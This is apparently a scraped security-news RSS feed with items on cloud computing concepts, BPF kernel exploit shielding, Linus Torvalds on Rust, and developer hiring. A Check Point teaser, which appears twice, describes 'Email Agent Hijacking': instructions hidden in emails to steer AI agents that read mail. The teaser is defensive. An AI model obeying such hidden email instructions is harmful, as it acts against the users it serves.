<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/3268073/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a>, a container orchestration platform that has gained significant traction in recent years, is often used in conjunction with other technologies like OpenStack to build <a href="https://www.infoworld.com/article/3281046/what-is-cloud-native-the-modern-way-to-develop-software.html">cloud-native</a> applications. Red Hat OpenShift is a comprehensive cloud platform based on Kubernetes that provides a managed experience for deploying and managing <a href="https://www.infoworld.com/article/3310941/why-you-should-use-docker-and-containers.html">container</a>-based, applications.</p>



<p class="wp-block-paragraph">Many cloud providers offer their own cloud-native platforms and tools, such as <a href="https://www.networkworld.com/article/968169/aws-rolls-out-outposts-for-on-premises-hybrid-cloud.html">AWS Outposts</a>, <a href="https://www.infoworld.com/article/2253985/a-cloud-in-your-datacenter-microsoft-azure-stack-arrives.html">Azure Stack</a>, and <a href="https://www.infoworld.com/article/2257617/what-is-google-cloud-anthos-managed-kubernetes-everywhere.html">Google Cloud Anthos</a>.</p>



<p class="wp-block-paragraph">Common factors to consider when evaluating private cloud platforms include the following:</p>



<ol class="wp-block-list">
<li><strong>Pricing</strong>: The initial cost of deployment and ongoing maintenance costs.</li>



<li><strong>Complexity</strong>: The level of technical expertise needed to manage the platform.</li>



<li><strong>Flexibility</strong>: The ability to customize the platform to meet specific needs.</li>



<li><strong>Vendor lock-in</strong>: The degree to which the organization is tied to a particular vendor.</li>



<li><strong>Security</strong>: The security features and capabilities of the platform.</li>



<li><strong>Scalability</strong>: The capability to expand the platform to meet future needs.</li>
</ol>



<h3 class="wp-block-heading"><strong>Hybrid cloud definition</strong></h3>



<p class="wp-block-paragraph">A <a href="https://www.infoworld.com/article/2257084/hybrid-cloud-private-cloud-public-cloud-multicloud-how-to-choose.html">hybrid cloud</a> is the integration of a private cloud with a public cloud. At its most developed, the hybrid cloud involves creating parallel environments in which applications can move easily between private and public clouds. In other instances, databases may stay in the customer data center and integrate with public cloud applications — or virtualized data center workloads may be replicated to the cloud during times of peak demand. The types of integrations between private and public clouds vary widely, but they must be extensive to earn a hybrid cloud designation.</p>



<h3 class="wp-block-heading"><strong>Public APIs (application programming interfaces) definition</strong></h3>



<p class="wp-block-paragraph">Just as SaaS delivers applications to users over the internet, public <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">APIs</a> offer developers application functionality that can be accessed programmatically. For example, in building web applications, developers often tap into the Google Maps API to provide driving directions; to integrate with social media, developers may call upon APIs maintained by Twitter, Facebook, or LinkedIn. <a href="https://www.infoworld.com/article/2253662/get-started-with-twilios-programmable-video-api.html">Twilio</a> has built a successful business delivering telephony and messaging services via public APIs. Ultimately, any business can provision its own public APIs to enable customers to consume data or access application functionality.</p>



<h3 class="wp-block-heading"><strong>iPaaS (integration platform as a service) definition</strong></h3>



<p class="wp-block-paragraph">Data integration is a key issue for any sizeable company, but particularly for those that adopt SaaS at scale. iPaaS providers typically offer prebuilt connectors for sharing data among popular SaaS applications and on-premises enterprise applications, though providers may focus more or less on business-to-business and e-commerce integrations, cloud integrations, or traditional SOA-style integrations. iPaaS offerings in the cloud from such providers as Dell Boomi, Informatica, MuleSoft, and SnapLogic also let users implement data mapping, transformations, and workflows as part of the integration-building process.</p>



<h3 class="wp-block-heading"><strong>IDaaS (identity as a service) definition</strong></h3>



<p class="wp-block-paragraph">The most difficult security issue related to <a href="https://www.infoworld.com/article/2268884/why-cloud-computing-is-always-a-good-question.html">cloud computing</a> is managing user identity and its associated rights and permissions across data centers and pubic cloud sites. <a href="https://www.csoonline.com/article/572759/idaas-explained-how-it-compares-to-iam.html">IDaaS providers</a> maintain cloud-based user profiles that authenticate users and enable access to resources or applications based on security policies, user groups, and individual privileges. The ability to integrate with various directory services (Active Directory, LDAP, etc.) and provide single sign-on across business-oriented SaaS applications is essential.</p>



<p class="wp-block-paragraph">Leaders in IDaaS include Microsoft, IBM, Google, Oracle, Okta, Capgemini, Okta, Junio Corporation, OneLogin, and JumpCloud. <strong> </strong></p>



<h3 class="wp-block-heading"><strong>Collaboration platforms</strong></h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/3595255/slack-adds-templates-to-help-users-kick-off-projects-quicker.html">Collaboration solutions such as Slack</a> and <a href="https://www.computerworld.com/article/3593909/microsoft-combines-teams-chat-and-channels-in-ui-refresh.html">Microsoft Teams</a> have become vital messaging platforms that enable groups to communicate and work together effectively. Basically, these solutions are relatively simple SaaS applications that support chat-style messaging along with file sharing and audio or video communication. Most offer APIs to facilitate integrations with other systems and enable third-party developers to create and share add-ins that augment functionality.</p>



<h3 class="wp-block-heading"><strong>Vertical clouds</strong></h3>



<p class="wp-block-paragraph">Key providers in such industries as financial services, healthcare, retail, life sciences, and manufacturing provide PaaS clouds to enable customers to build vertical applications that tap into industry-specific, API-accessible services. Vertical clouds can dramatically reduce the time to market for vertical applications and accelerate domain-specific B2B integrations. Most vertical clouds are built with the intent of nurturing partner ecosystems.</p>



<h2 class="wp-block-heading"><strong>Other cloud computing considerations</strong></h2>



<p class="wp-block-paragraph">The most widely accepted definition of cloud computing means that you run your workloads on someone else’s servers, but this is not the same as outsourcing. Virtual cloud resources and even SaaS applications must be configured and maintained by the customer. Consider these factors when planning a cloud initiative.</p>



<h3 class="wp-block-heading"><strong>Cloud computing security considerations</strong></h3>



<p class="wp-block-paragraph">Objections to the public cloud generally begin with <a href="https://www.csoonline.com/article/555213/top-cloud-security-threats.html">cloud security</a>, although the major public clouds have proven themselves much less susceptible to attack than the average enterprise data center.</p>



<p class="wp-block-paragraph">Of greater concern is the integration of security policy and identity management between customers and public cloud providers. In addition, government regulation may forbid customers from allowing sensitive data off-premises. Other concerns include the risk of outages and the long-term operational costs of public cloud services.</p>



<h3 class="wp-block-heading"><strong>Multicloud management considerations</strong></h3>



<p class="wp-block-paragraph">To enhance their operational efficiency, reduce costs, and improve security, many companies are increasingly turning to <a href="https://www.infoworld.com/article/2335587/can-cloud-computing-be-truly-federated.html">multicloud strategies</a>. By distributing workloads across <a href="https://www.infoworld.com/article/2336303/are-the-different-public-clouds-really-that-different.html">multiple cloud providers</a>, organizations can avoid vendor lock-in, <a href="https://www.infoworld.com/article/2261783/3-cloud-architecture-patterns-that-optimize-scalability-and-cost.html">optimize costs</a>, and leverage the best-of-breed services offered by different providers.</p>



<p class="wp-block-paragraph">This multicloud approach also improves performance and reliability by minimizing downtime and optimizing latency. Additionally, multicloud strategies strengthen security by diversifying the attack surface and facilitating compliance with industry regulations. Finally, by replicating critical workloads across multiple regions and providers, companies can establish robust disaster recovery and business continuity plans, ensuring minimal disruption in the event of catastrophic failures.</p>



<p class="wp-block-paragraph">The bar to qualify as a <a href="https://www.infoworld.com/article/2256706/what-is-multicloud-the-next-step-in-cloud-computing.html">multicloud</a> adopter is low: A customer just needs to use more than one public cloud service. However, depending on the number and variety of cloud services involved, managing multiple clouds can become complex from both a cost optimization and a technology perspective.</p>



<p class="wp-block-paragraph">In some cases, customers subscribe to multiple cloud services simply to avoid dependence on a single provider. A more sophisticated approach is to select public clouds based on the unique services they offer and, in some cases, integrate them. For example, developers might want to use Google’s <a href="https://www.infoworld.com/article/2336686/google-vertex-ai-studio-puts-the-promise-in-generative-ai.html">Vertex AI Studio</a> on Google Cloud Platform to build AI-driven applications, but prefer <a href="https://www.infoworld.com/article/2260091/what-is-jenkins-the-ci-server-explained.html">Jenkins</a> hosted on the CloudBees platform for <a href="https://www.infoworld.com/article/3271126/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">continuous integration</a>.</p>



<p class="wp-block-paragraph">To control costs and reduce management overhead, some customers opt for <a href="https://www.infoworld.com/article/3520828/how-cloud-custodian-conquered-cloud-resource-management.html">cloud management platforms</a> (CMPs) and/or cloud service brokers (CSBs), which let you manage multiple clouds as if they were one cloud. The problem is that these solutions tend to limit customers to such common-denominator services as storage and compute, ignoring the panoply of services that make each cloud unique.</p>



<h3 class="wp-block-heading"><strong>Edge computing considerations</strong></h3>



<p class="wp-block-paragraph">You often see <a href="https://www.networkworld.com/article/964305/what-is-edge-computing-and-how-it-s-changing-the-network.html">edge computing</a> incorrectly described as an alternative to cloud computing. Edge computing is about moving compute to local devices in a highly distributed system, typically as a layer around a cloud computing core. There is typically a cloud involved to orchestrate all of the devices and take in their data, then analyze it or otherwise act on it. </p>



<h3 class="wp-block-heading"><strong>To the cloud and back – why repatriation is real</strong></h3>



<p class="wp-block-paragraph">While public cloud offers scalability and flexibility, some enterprises are opting to <a href="https://www.infoworld.com/article/2336102/why-companies-are-leaving-the-cloud.html">return to on-premises infrastructure</a> due to rising costs, data security concerns, performance issues, vendor lock-in, and regulatory compliance challenges. While the public cloud offers scalability and flexibility, on-premises infrastructure provides greater control, customization, and potential cost savings in certain scenarios leading some technology decision-makers to <a href="https://www.infoworld.com/article/2336835/do-you-need-to-repatriate-from-the-cloud.html">consider repatriation</a>. However, a hybrid cloud approach, combining public and private cloud, often offers the best balance of benefits.</p>



<p class="wp-block-paragraph">More specific reasons to repatriate including the following:</p>



<ul class="wp-block-list">
<li>Unanticipated costs, such as data transfer fees, storage charges, and <a href="https://www.infoworld.com/article/2336430/why-public-cloud-providers-are-cutting-egress-fees.html">egress fees</a>, can quickly escalate, especially for large-scale cloud deployments.  </li>



<li>Inaccurate resource provisioning or underutilization can lead to higher-than-expected costs.</li>



<li>Stricter <a href="https://www.infoworld.com/article/3545268/why-cloud-security-outranks-cost-and-scalability.html">data privacy regulations</a> require organizations to store and process data within specific geographic boundaries.  </li>



<li>For highly sensitive data, companies may prefer to maintain greater control over security measures and access permissions. </li>



<li><a href="https://www.infoworld.com/article/2338856/cloud-may-be-overpriced-compared-to-on-premises-systems.html">On-premises infrastructure</a> can offer lower latency, particularly for applications requiring real-time processing or high-performance computing.  </li>



<li>Overreliance on a single cloud provider can limit flexibility and increase costs. Repatriation allows organizations to diversify their infrastructure and reduce vendor dependency.  </li>



<li>Industries with stringent compliance requirements may find it easier to meet standards with on-premises infrastructure.  </li>



<li>On-premises environments offer greater control over hardware, software, and network configurations, allowing for customized solutions.  </li>
</ul>



<h2 class="wp-block-heading"><strong>Benefits of cloud computing</strong></h2>



<p class="wp-block-paragraph">The cloud’s main appeal is to reduce the time to market of applications that need to scale dynamically. Increasingly, however, developers are drawn to the cloud by the abundance of advanced new services that can be incorporated into applications, from machine learning to internet of things (IoT) connectivity.</p>



<p class="wp-block-paragraph">Although businesses sometimes migrate legacy applications to the cloud to reduce data center resource requirements, the real benefits accrue to new applications that take advantage of cloud services and “cloud native” attributes. The latter include <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices architecture</a>, <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Linux containers</a> to enhance application portability, and container management solutions such as <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a> that orchestrate container-based services. <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html">Cloud-native</a> approaches and solutions can be part of either public or private clouds and help enable highly efficient <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">devops</a> workflows.</p>



<p class="wp-block-paragraph">Cloud computing, be it public or private or hybrid or multicloud, has become the platform of choice for large applications, particularly customer-facing ones that need to change frequently or scale dynamically. More significantly, the major public clouds now lead the way in enterprise technology development, debuting new advances before they appear anywhere else. Workload by workload, enterprises are opting for the cloud, where an endless parade of exciting new technologies invite innovative use.</p>



<p class="wp-block-paragraph">SaaS has its roots in the ASP (application service provider) trend of the early 2000s, when providers would run applications for business customers in the provider’s data center, with dedicated instances for each customer. The ASP model was a spectacular failure because it quickly became impossible for providers to maintain so many separate instances, particularly as customers demanded customizations and updates.</p>



<p class="wp-block-paragraph">Salesforce is widely considered the first company to launch a highly successful SaaS application using <a href="https://www.infoworld.com/article/2335534/the-evolution-of-multitenancy-for-cloud-computing.html">multitenancy</a> — a defining characteristic of the SaaS model. Rather than each Salesforce customer getting its own application instance, customers who subscribe to the company’s salesforce automation software share a single, large, dynamically scaled instance of an application (like tenants sharing an apartment building), while storing their data in separate, secure repositories on the SaaS provider’s servers. Fixes can be rolled out behind the scenes with zero downtime and customers can receive UX or functionality improvements as they become available.</p>



<p class="wp-block-paragraph"></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] Shielding running kernels against exploits with BPF]]></title>
<description><![CDATA[Cisco has some unusual challenges when it comes to deploying security patches
across the company's many devices running custom kernels. John Fastabend spoke
about his work preventing exploits with BPF at the 2026

Linux Storage,
Filesystem, Memory-Management, and BPF Summit.
The technique could s...]]></description>
<link>https://tsecurity.de/de/3665550/linux-tipps/shielding-running-kernels-against-exploits-with-bpf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665550/linux-tipps/shielding-running-kernels-against-exploits-with-bpf/</guid>
<pubDate>Mon, 13 Jul 2026 16:24:34 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>
Cisco has some unusual challenges when it comes to deploying security patches
across the company's many devices running custom kernels. John Fastabend spoke
about his work preventing exploits with BPF at the 2026
<a href="https://events.linuxfoundation.org/lsfmmbpf/">
Linux Storage,
Filesystem, Memory-Management, and BPF Summit</a>.
The technique could substantially reduce the time necessary to respond to kernel
vulnerabilities, but it will not be fully effective unless more hooks are added
to the kernel.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Email Agent Hijacking: The Hidden Threat That Breaks Post-Delivery Security]]></title>
<description><![CDATA[Key takeaways  AI agents create a new email attack surface because they can process content before humans see it Email Agent Hijacking hides instructions in email content to manipulate AI interpretation, decisions, or outputs Post-delivery controls are too late when…
Read more →
The post Email Ag...]]></description>
<link>https://tsecurity.de/de/3665409/it-security-nachrichten/email-agent-hijacking-the-hidden-threat-that-breaks-post-delivery-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665409/it-security-nachrichten/email-agent-hijacking-the-hidden-threat-that-breaks-post-delivery-security/</guid>
<pubDate>Mon, 13 Jul 2026 15:38:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key takeaways  AI agents create a new email attack surface because they can process content before humans see it Email Agent Hijacking hides instructions in email content to manipulate AI interpretation, decisions, or outputs Post-delivery controls are too late when…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/email-agent-hijacking-the-hidden-threat-that-breaks-post-delivery-security/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/email-agent-hijacking-the-hidden-threat-that-breaks-post-delivery-security/">Email Agent Hijacking: The Hidden Threat That Breaks Post-Delivery Security</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Email Agent Hijacking: The Hidden Threat That Breaks Post-Delivery Security]]></title>
<description><![CDATA[Key takeaways  AI agents create a new email attack surface because they can process content before humans see it Email Agent Hijacking hides instructions in email content to manipulate AI interpretation, decisions, or outputs Post-delivery controls are too late when an AI agent acts immediately a...]]></description>
<link>https://tsecurity.de/de/3665387/it-security-nachrichten/email-agent-hijacking-the-hidden-threat-that-breaks-post-delivery-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665387/it-security-nachrichten/email-agent-hijacking-the-hidden-threat-that-breaks-post-delivery-security/</guid>
<pubDate>Mon, 13 Jul 2026 15:24:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="800" height="400" src="https://blog.checkpoint.com/wp-content/uploads/2025/12/Collaboration_Blog_800x400_02-1.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" srcset="https://blog.checkpoint.com/wp-content/uploads/2025/12/Collaboration_Blog_800x400_02-1.jpg 800w, https://blog.checkpoint.com/wp-content/uploads/2025/12/Collaboration_Blog_800x400_02-1-300x150.jpg 300w, https://blog.checkpoint.com/wp-content/uploads/2025/12/Collaboration_Blog_800x400_02-1-768x384.jpg 768w, https://blog.checkpoint.com/wp-content/uploads/2025/12/Collaboration_Blog_800x400_02-1-400x200.jpg 400w, https://blog.checkpoint.com/wp-content/uploads/2025/12/Collaboration_Blog_800x400_02-1-600x300.jpg 600w" sizes="(max-width: 800px) 100vw, 800px"><p>Key takeaways  AI agents create a new email attack surface because they can process content before humans see it Email Agent Hijacking hides instructions in email content to manipulate AI interpretation, decisions, or outputs Post-delivery controls are too late when an AI agent acts immediately after delivery Organizations need preventive protection for AI-consumed content and validation for AI-generated responses AI agents are now reading and writing emails before humans ever see them. What was once a human-centric communication channel is quickly becoming an AI-driven workflow, and that shift introduces a new and largely unprotected attack surface.  Much of the industry’s recent attention has centered […]</p>
<p>The post <a href="https://blog.checkpoint.com/email-security/email-agent-hijacking-the-hidden-threat-that-breaks-post-delivery-security/">Email Agent Hijacking: The Hidden Threat That Breaks Post-Delivery Security</a> appeared first on <a href="https://blog.checkpoint.com/">Check Point Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linus Torvalds on Rust, C, Bugs, and AI Patch-Checking Tools]]></title>
<description><![CDATA["Git and email are the two really only tools I use," Linus Torvalds said at Open Source Summit India 2026. But ZDNet reports that he also shared his thoughts on Rust, C, and patch-checking tools:



"I use Google as a way to look things up." He added, "I'm unusual; most of the other maintainers e...]]></description>
<link>https://tsecurity.de/de/3665134/it-security-nachrichten/linus-torvalds-on-rust-c-bugs-and-ai-patch-checking-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665134/it-security-nachrichten/linus-torvalds-on-rust-c-bugs-and-ai-patch-checking-tools/</guid>
<pubDate>Mon, 13 Jul 2026 13:54:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["Git and email are the two really only tools I use," Linus Torvalds said at Open Source Summit India 2026. But ZDNet reports that he also shared his thoughts on Rust, C, and patch-checking tools:



"I use Google as a way to look things up." He added, "I'm unusual; most of the other maintainers end up using many more tools, and I think a lot of them are starting to use AI tools for patch checking," while he "works at a higher level. I work with people, not tools." 

When asked about Rust both in Git and the kernel, he pushed back against hype: "I'm not sure Rust is going to take over the world. I still think Rust is very interesting, [but] I still find C to be a much simpler tool." Torvalds continued, "I'm much more excited about all the tools we have for verification of C," including "automated patch verification tools" and "automated email checking tools for patches like Sashiko." Summing up, Torvalds told the Mumbai audience: "I'm more of a hack-and-slash kind of person, and I still like the raw and simple power of C, and I don't think that's going to change." 

Torvalds also warned against overestimating Rust's benefits: "Rust fixes a few easy bugs that you can make in C, but it does not fix the logic errors, right? It does not think for you, and when you write incorrect code, the language does not matter. The end result will be incorrect." On mixed C/Rust code bases, he pointed out that guarantees are limited: "The guarantees that Rust give you only apply in the Rust-only parts of your code base, and wherever you interact with C code, all bets are off," with most Rust code in Linux talking to "core kernel C code" that is "much better quality... because that code has been tested in every single environment." 

At the same time, Torvalds pointed out, "some of our big and more high-profile bugs in the kernel lately have been logic errors" rather than the kind of memory errors Rust prevents. 

"It was just bad programming, which sadly happens even in carefully maintained subsystems and important kernels that are supposed to be very secure."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Linus+Torvalds+on+Rust%2C+C%2C+Bugs%2C+and+AI+Patch-Checking+Tools%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F12%2F2126243%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F12%2F2126243%2Flinus-torvalds-on-rust-c-bugs-and-ai-patch-checking-tools%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/07/12/2126243/linus-torvalds-on-rust-c-bugs-and-ai-patch-checking-tools?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Where the software development jobs are now]]></title>
<description><![CDATA[While many technology companies have slowed hiring or even launched significant layoffs, that doesn’t mean job opportunities have dried up for software developers. In fact, skilled developers—particularly those with knowledge of AI—are in demand in other industries.



The key to success for deve...]]></description>
<link>https://tsecurity.de/de/3664782/ai-nachrichten/where-the-software-development-jobs-are-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664782/ai-nachrichten/where-the-software-development-jobs-are-now/</guid>
<pubDate>Mon, 13 Jul 2026 11:33:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>While many technology companies have slowed hiring or even launched <a href="https://www.trueup.io/layoffs" data-type="link" data-id="https://www.trueup.io/layoffs">significant layoffs</a>, that doesn’t mean job opportunities have dried up for software developers. In fact, skilled developers—particularly those with <a href="https://www.infoworld.com/article/4025073/9-ai-development-skills-tech-companies-want.html" data-type="link" data-id="https://www.infoworld.com/article/4025073/9-ai-development-skills-tech-companies-want.html">knowledge of AI</a>—are in demand in other industries.</p>



<p>The key to success for developers looking to snatch up these roles is to be well-prepared to meet the needs of potential employers in a variety of sectors.</p>



<p>“The demand for developers in non-tech sectors is real and growing, but the roles look different from what you’d find at a software company,” says <a href="https://drexel.edu/cci/about/directory/A/Awasthi-Pragati/" data-type="link" data-id="https://drexel.edu/cci/about/directory/A/Awasthi-Pragati/">Pragati Awasthi</a>, assistant teaching professor of AI and data science at Drexel University.</p>



<p>“Across all these sectors, the common thread is that software is no longer a support function; it is embedded in core operations,” Awasthi says. “The developer in these environments is often the person translating domain-specific business problems into technical solutions, which requires a different profile than a pure product engineer at a tech firm.”</p>



<h2 class="wp-block-heading">Opportunity knocks</h2>



<p>The tech industry has long been a mainstay as far as employing software developers. But as these businesses trim staffs in efforts to cut expenses, that has impacted the hiring landscape. Even as the tech sector scales back, however, companies in industries such as financial services/fintech, healthcare/healthtech, retail/ecommerce, and manufacturing are looking to acquire programming talent.</p>



<p>“The unifying factor is data complexity,” Awasthi says. “These industries generate large volumes of sensitive, regulated, or operationally critical data, and they need developers who can build and maintain systems that handle it responsibly.”</p>



<p>While recruiting firm Summit Search Group has placed developers in roles with technology companies, “it is just as common to recruit them for roles outside this niche,” says <a href="https://www.linkedin.com/in/matterhard/" data-type="link" data-id="https://www.linkedin.com/in/matterhard/">Matt Erhard</a>, managing partner at the company. “There are actually a fairly wide variety of roles available for developers in industries beyond tech,” Erhard says.</p>



<p>For example, in financial services Summit Search Group has seen significant hiring for back-end and data engineers who can build and maintain fraud detection systems, digital banking platforms, and regulatory tools, Erhard says. In healthcare, companies are hiring developers to build AI-driven diagnostics platforms and patient portals, or to work with systems that manage electronic health records, he says.</p>



<p>In manufacturing and industrial companies, developers are needed for systems integration and embedded software related to predictive maintenance, <a href="https://www.networkworld.com/article/963923/what-is-iot-the-internet-of-things-explained.html" data-type="link" data-id="https://www.networkworld.com/article/963923/what-is-iot-the-internet-of-things-explained.html">Internet of Things</a> (IoT) systems, and smart factories. And in retail and ecommerce, there’s strong demand for <a href="https://www.infoworld.com/article/2259033/full-stack-developer-what-it-is-and-how-you-can-become-one.html" data-type="link" data-id="https://www.infoworld.com/article/2259033/full-stack-developer-what-it-is-and-how-you-can-become-one.html">full-stack developers</a> and data developers who can handle logistics systems, omni-channel platforms, and personalization engines, Erhard says.</p>



<p>“One significant function where we’ve been placing developer talent lately is in developing business systems and internal applications,” Erhard says. These roles often have titles such as systems engineer or application developer, and professionals are hired to handle tasks such as customizing customer relationship management (CRM) or enterprise resource planning (ERP) platforms, building workflow automation tools or modernizing legacy systems, he says.</p>



<p>Other core functions for which Summit Search Group has placed a lot of developers include data, analytics, and AI-enablement. “That could be directly involved with <a href="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html">data engineering</a> or in building tools like reporting systems and <a href="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html">ETL [extract, transform, load]</a> pipelines,” Erhard says.</p>



<p>The firm also has handled searches for developers who can build and maintain customer-facing products for banking, healthcare, and retail companies, such as mobile apps or digital platforms customers can use to interact with companies.</p>



<p>Randstad Digital, a provider of global technology talent, sees demand for roles including web developers, system developers, and app developers. “These professionals would work on anything from customer-facing platforms to internal tools,” says <a href="https://www.linkedin.com/in/mpmorris36/" data-type="link" data-id="https://www.linkedin.com/in/mpmorris36/">Michael Morris</a>, global head of platform and talent at the company. “Non-tech companies are also often hiring roles like software architecture and <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html" data-type="link" data-id="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">devops</a> to help scale existing technology. These involve being more ingrained in the business, like building a supply chain system for a retailer, rather than creating individual tech products like you would at a technology company.”</p>



<h2 class="wp-block-heading">Prep for success</h2>



<p>To increases the chances of success at landing developer jobs outside of the tech industry, development professionals would be wise to follow some good practices.</p>



<h3 class="wp-block-heading">Boost AI skills</h3>



<p>One best practice is to boost skills in using AI-powered tools and get familiar with all things AI.</p>



<p>“Get fluent with AI-assisted development and its limits,” Awasthi says. “This is not optional. Organizations across every sector expect developers to use AI coding tools productively. But the more durable skill is knowing when AI output is wrong, incomplete, or unsuitable for a regulated context. That critical evaluation capacity is what non-tech employers are increasingly trying to hire.”</p>



<p>AI does not necessarily replace the need for human developers so much as it changes the skills profile for those roles, Erhard says. “The biggest difference in recent years is that AI literacy is now a non-negotiable,” he says. “At minimum, developers today need to understand concepts like <a href="https://www.infoworld.com/article/4122440/what-is-prompt-engineering-the-art-of-ai-orchestration.html" data-type="link" data-id="https://www.infoworld.com/article/4122440/what-is-prompt-engineering-the-art-of-ai-orchestration.html">prompt engineering</a> and how to use AI tools to improve their efficiency.”</p>



<p>One thing many job candidates don’t expect is that the rise of AI has also increased the importance of high-level skills such as problem framing, system design, and cross-functional communication,” Erhard says. “Essentially, if something is related to development but too complex or nuanced for an AI to handle effectively, then the demand is high for human developers who have that expertise,” he says.</p>



<p>Candidates who land roles consistently have experience building AI-augmented workflows along with standard coding skills, Erhard says. “Employers increasingly expect to hire developers who can leverage AI, so demonstrating this experience on your résumé can be very beneficial,” he says.</p>



<h3 class="wp-block-heading">Gain domain knowledge</h3>



<p>Summit Search Group is seeing high demand for developers with deep domain knowledge in an organization’s specific industry. “So, for instance, if someone is both an experienced developer and has expertise in healthcare compliance, or financial regulations, then those candidates tend to be very sought after,” Erhard says.</p>



<p>Domain fluency is an underrated skill, Awasthi says. “A developer who understands healthcare compliance, financial regulation, or manufacturing process logic is significantly harder to replace than one who only writes clean code,” she says. “AI can generate boilerplate. It cannot navigate a HIPAA audit or explain a model’s output to a compliance officer.”</p>



<p>Development professionals should “pick an industry and learn it seriously; not just the technology stack but the regulatory environment, the business model, and the actual problems practitioners face,” Awasthi says. “A developer who has read about HIPAA, or spent time understanding credit risk, is immediately more valuable in those hiring contexts.”</p>



<p>It’s also vital to demonstrate real-world, practical application of skills, not just credentials. “The strongest candidates have projects in their portfolio that directly tie to and solve real business problems,” Erhard says.</p>



<h3 class="wp-block-heading">Acquire soft skills</h3>



<p>And then there are the soft skills that are becoming more of a differentiator than they were in the past. As AI handles more routine coding, human developers are expected to make more architectural decisions and collaborate across departments, Erhard says. “Strong communication and problem-solving skills are critical for many of the developer roles that we’re filling today,” he says.</p>



<p>While technical skills are still relevant for developers using and managing AI tools, “they also need to develop the skill of ‘deeper thinking’ and learn how to think one step ahead,” Morris says. “This includes skills like system design mastery—understanding the macro view and learning how <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html" data-type="link" data-id="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a>, databases, and third-party APIs interact securely and efficiently.”</p>



<p>They also should become deeply fluent in the AI coding tools commonly used in their particular industry, with a strong understanding of how to prompt them for optimal output, Morris says. Product context awareness is also useful. “AI doesn’t know what the customer wants, but you do,” Morris says. “Understanding the business problem and the end-user experience is a requirement for being able to guide LLMs.”</p>



<h3 class="wp-block-heading">Master debugging and incident response</h3>



<p>Developers looking to break into non-tech sectors also should develop skills in debugging and incident response, Morris says. “Complex systems with multiple AI agents can, and will, fail, which means companies need humans to trace logic flaws to get the system back on track,” he says. “A mastery of root-cause analysis is a critical skill.”</p>



<p>“Security, compliance, and reliability are very important in non-tech industries like finance and healthcare,” says <a href="https://www.linkedin.com/in/rohit-agarwal/" data-type="link" data-id="https://www.linkedin.com/in/rohit-agarwal/">Rohit Agarwal</a>, co-founder of Zenius, a remote hiring company. “So employers want developers who also know regulatory environments well.”</p>



<h3 class="wp-block-heading">Network and keep learning</h3>



<p>To successfully pivot from jobs at tech companies, “continuous learning, upskilling, and building hybrid skills that combine technical and business knowledge are essential,” Morris says. “With the right preparation, tech professionals can adapt and continue to thrive in meaningful, dynamic careers.”</p>



